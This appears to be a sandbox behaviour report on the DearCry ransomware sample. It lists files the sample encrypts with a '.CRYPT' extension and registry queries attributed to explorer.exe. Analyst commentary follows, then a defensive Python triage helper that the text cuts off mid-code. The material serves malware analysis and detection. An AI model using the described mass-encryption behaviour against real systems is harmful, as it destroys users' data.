| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-convert-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmlrwbin_xl.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ODATACPP.DLL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\MedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\MicrosoftLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icudt58.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-processthreads-l1-1-1.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-us\wintlim.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\ssleay32.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\System\mfc140u.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FirstRunMailBlurred.layoutdir-RTL.jpg | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarLogoExtensions.scale-48.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\LargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ThirdPartyNotices.MSHWLatin.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\UIAutomationClientSideProviders.resources.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-datetime-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.WebClient.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-utility-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-150.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleSplashScreen.scale-200.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\snooze.contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreLogo.scale-100.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\es\UIAutomationClient.resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de\UIAutomationClientSideProviders.resources.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\System.Windows.Controls.Ribbon.resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
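The two tables above make two different points that are easy to conflate when reading a sandbox report. The "Drops file in Program Files directory" rows show the actual sample (DearCry_13_03_2021_1292KB.exe) creating files with an appended `.CRYPT` extension and dropping a `readme.txt`, which is the mass-rename-plus-note pattern a ransomware detection should key on. The "Checks SCSI registry key(s)" rows, by contrast, are attributed in the Process column to C:\Windows\explorer.exe, not to the sample, just as the earlier volume opens on \??\D: and \??\F: and the Internet Explorer GPU keys below are attributed to explorer.exe and SearchApp.exe; those are desktop background activity and should not be read as anti-VM checks performed by the sample. The following triage helper is an added example, not part of the sandbox report: it parses rows in the report's own table layout, attributes each event to its process, discards events from a configurable set of background processes, and flags any remaining process that creates several files with an appended extension plus a note file. The handful of sample rows are constructed from paths on this page (abridged), the background-process set and the `readme.txt` note name are assumptions to adjust per environment, and the double-extension heuristic is a rule of thumb rather than a family signature.

```python
"""Triage helper for sandbox behaviour tables (added example, not report output)."""
import re
from collections import Counter, defaultdict

# Sandbox-desktop processes whose events say nothing about the sample (assumption).
BACKGROUND_PROCESSES = {"explorer.exe", "searchapp.exe"}

# Ransom-note names to look for; only readme.txt appears on this page (assumption).
NOTE_NAMES = {"readme.txt"}

# Constructed rows in the report's own layout, paths abridged from the page.
SAMPLE_ROWS = r"""
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\fxplugins.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libadf_plugin.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.DiaSymReader.Native.amd64.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\PROGRAM FILES\WINDOWSAPPS\MICROSOFT.VCLIBS.140.00.UWPDESKTOP_14.0.27629.0_X64__8WEKYB3D8BBWE\MICROSOFT.SYSTEM.PACKAGE.METADATA\AUTOGEN\readme.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
"""

ROW_RE = re.compile(r"^\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|$")

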